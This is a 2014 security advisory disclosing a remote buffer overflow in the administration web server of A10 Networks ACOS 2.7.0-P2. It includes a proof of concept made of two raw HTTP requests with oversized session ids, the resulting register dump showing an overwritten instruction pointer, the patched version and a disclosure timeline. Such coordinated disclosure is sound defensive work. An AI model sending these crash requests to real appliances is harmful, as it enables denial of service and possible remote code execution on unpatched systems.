Article

A10 Networks remote Buffer Overflow

02-04-2014

Quantum Leap Advisory: A10 Networks remote Buffer Overflow in ACOS[1] 2.7.0-P2 – Adivsory #QLA140402
Affected Product: ACOS 2.7.0-P2(build: 53)  (older versions may be affected too) (Tested on SoftAX[2])
Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

Executive Summary

Using a specially crafted HTTP request to the administration web server, it is possible to exploit a lack in the  user input validation. Successful exploitation of the vulnerability may result in remote code execution. Unsuccessful exploitation of the vulnerability may result in a Denial of Service of the administrative interface.

Proof of Concept

Submitting arbitrary input in the HTTP request it’s possible to cause a buffer overflow. If you provide an overly long “session id” in the request, the web server crashes. To reproduce the crash you can send one of the following requests to the web server:

GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

 

GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Once the crash occurs the following is the registers state of the SoftAX appliance:

rax 0x0 0
rbx 0x1e30300 31654656
rcx 0x6 6
rdx 0xffffffff 4294967295
rsi 0xcac18f12 3401682706
rdi 0x4141414141414141 4702111234474983745
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffbdf9b400 0x7fffbdf9b400
r8 0x2000 8192
r9 0x20 32
r10 0x0 0
r11 0x7f10b4cec180 139709729653120
r12 0x0 0
r13 0x1e30318 31654680
r14 0x1e30300 31654656
r15 0x1e33b58 31669080
rip 0x524149 0x524149
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]

 

Solution

To fix the A10 Networks remote Buffer Overflow you have to upgrade at least to version  2.7.0-p6

Disclosure Timeline

2013-05-11 – A10 Networks remote Buffer Overflow discovered
2013-05-28 – Initial vendor notification
2013-05-30 – The vendor acknowledge the vulnerability (bug 128069 )
2014-03-28 – The vendor fixed the vulnerability[3]
2014-04-02 – Public advisory

References

[1] http://www.a10networks.com/about/technology_platform_acos.php
[2] http://www.a10networks.com/glossary/SoftAX.php
[3] https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf

L'hai trovato interessante?